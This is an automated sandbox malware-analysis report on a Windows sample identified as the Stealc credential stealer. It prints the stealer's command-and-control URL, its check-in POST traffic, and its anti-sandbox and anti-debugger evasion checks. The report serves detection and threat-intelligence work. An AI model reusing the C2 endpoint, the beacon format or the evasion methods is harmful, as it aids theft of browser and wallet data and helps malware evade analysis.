Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1524420
MD5:9267e551326d9f70ca969543647f060b
SHA1:19a3f3bff029fb895b5d256d6d6a4cce1e5d8a85
SHA256:4ffb89ed6560f1f1e8c683cd4451982c9588cf8ac2846f652ba88e611dc639bd
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1164 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 9267E551326D9F70CA969543647F060B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2050199522.0000000004AF0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1164JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1164JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.f00000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-02T19:07:57.397568+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.f00000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00F0C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F09AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00F09AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F07240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00F07240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F09B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00F09B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F18EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00F18EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00F138B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F14910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00F0DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00F0E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00F14570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00F0ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F016D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F0F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00F13EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0F68A FindFirstFileA,0_2_00F0F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00F0BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F0DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIEHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 46 42 30 32 30 37 43 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="hwid"F77FB0207C0F807656615------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="build"doma------ECGDHIDAAFHIIDGDBFIE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F04880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00F04880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHIDAAFHIIDGDBFIEHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 37 46 42 30 32 30 37 43 30 46 38 30 37 36 35 36 36 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 49 44 41 41 46 48 49 49 44 47 44 42 46 49 45 2d 2d 0d 0a Data Ascii: ------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="hwid"F77FB0207C0F807656615------ECGDHIDAAFHIIDGDBFIEContent-Disposition: form-data; name="build"doma------ECGDHIDAAFHIIDGDBFIE--
                Source: file.exe, 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpTW
                Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpxv
                Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BB1920_2_013BB192
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C81860_2_012C8186
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012BF1CC0_2_012BF1CC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0121B8D80_2_0121B8D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012410DF0_2_012410DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C322F0_2_012C322F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01362A9E0_2_01362A9E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0123DAE40_2_0123DAE4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01231DCF0_2_01231DCF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01345C380_2_01345C38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C9C1C0_2_012C9C1C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0129C4BA0_2_0129C4BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C175A0_2_012C175A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012ADE230_2_012ADE23
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118DE780_2_0118DE78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012CB6B40_2_012CB6B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013686EE0_2_013686EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01360ECE0_2_01360ECE
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00F045C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: xmtfkgun ZLIB complexity 0.9947668224116359
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2050199522.0000000004AF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F18680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00F18680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F13720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00F13720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\C411JGDX.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1793024 > 1048576
                Source: file.exeStatic PE information: Raw size of xmtfkgun is bigger than: 0x100000 < 0x18fa00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f00000.0.unpack :EW;.rsrc :W;.idata :W; :EW;xmtfkgun:EW;toxpwvxv:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;xmtfkgun:EW;toxpwvxv:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F19860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1bb8f1 should be: 0x1c35f2
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: xmtfkgun
                Source: file.exeStatic PE information: section name: toxpwvxv
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0133D11F push 0755C316h; mov dword ptr [esp], edx0_2_0133D146
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0133810A push esi; mov dword ptr [esp], edx0_2_01338156
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136794A push ebp; mov dword ptr [esp], 6BC3CA82h0_2_01367984
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0136794A push eax; mov dword ptr [esp], ecx0_2_01367A0D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011BE99E push ebx; mov dword ptr [esp], ecx0_2_011BEA0C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011BE99E push ebx; mov dword ptr [esp], eax0_2_011BEA56
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011BE99E push 573C248Eh; mov dword ptr [esp], ecx0_2_011BEAAC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011BE99E push ecx; mov dword ptr [esp], edx0_2_011BEB22
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BB192 push edi; mov dword ptr [esp], ecx0_2_013BB276
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BB192 push esi; mov dword ptr [esp], eax0_2_013BB28C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_013BB192 push edx; mov dword ptr [esp], 1207F155h0_2_013BB2A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push 2971D7EEh; mov dword ptr [esp], ebp0_2_012C81B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push edx; mov dword ptr [esp], 2D1A8914h0_2_012C81CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push ebp; mov dword ptr [esp], esi0_2_012C81EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push ebp; mov dword ptr [esp], 7EE7E611h0_2_012C820A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push edx; mov dword ptr [esp], eax0_2_012C8254
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push 61F7E6F3h; mov dword ptr [esp], edi0_2_012C82B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push ebx; mov dword ptr [esp], 1093CAA1h0_2_012C82E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push ebx; mov dword ptr [esp], edx0_2_012C82EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push edx; mov dword ptr [esp], edi0_2_012C82FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push ebp; mov dword ptr [esp], eax0_2_012C8366
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push ebp; mov dword ptr [esp], edx0_2_012C8386
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push 30A3B386h; mov dword ptr [esp], esi0_2_012C83B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push eax; mov dword ptr [esp], 76FFBFC7h0_2_012C8498
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push esi; mov dword ptr [esp], 3B7D5FBBh0_2_012C84E5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push ebx; mov dword ptr [esp], edx0_2_012C8713
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push 37D27409h; mov dword ptr [esp], edi0_2_012C879C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push ebp; mov dword ptr [esp], 50C93677h0_2_012C882A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push 4127DC00h; mov dword ptr [esp], eax0_2_012C8862
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push 36E5EE3Ah; mov dword ptr [esp], ebp0_2_012C886F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_012C8186 push 2172076Bh; mov dword ptr [esp], esi0_2_012C89DE
                Source: file.exeStatic PE information: section name: xmtfkgun entropy: 7.9523327915554285

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F19860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13639
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C481F second address: 12C4823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4823 second address: 12C4827 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4827 second address: 12C482D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C482D second address: 12C4843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF674E409BAh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4843 second address: 12C4847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12C4847 second address: 12C484B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D05C7 second address: 12D05CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D0735 second address: 12D0759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF674E409B6h 0x00000009 jmp 00007FF674E409C7h 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12D376A second address: 12D376E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
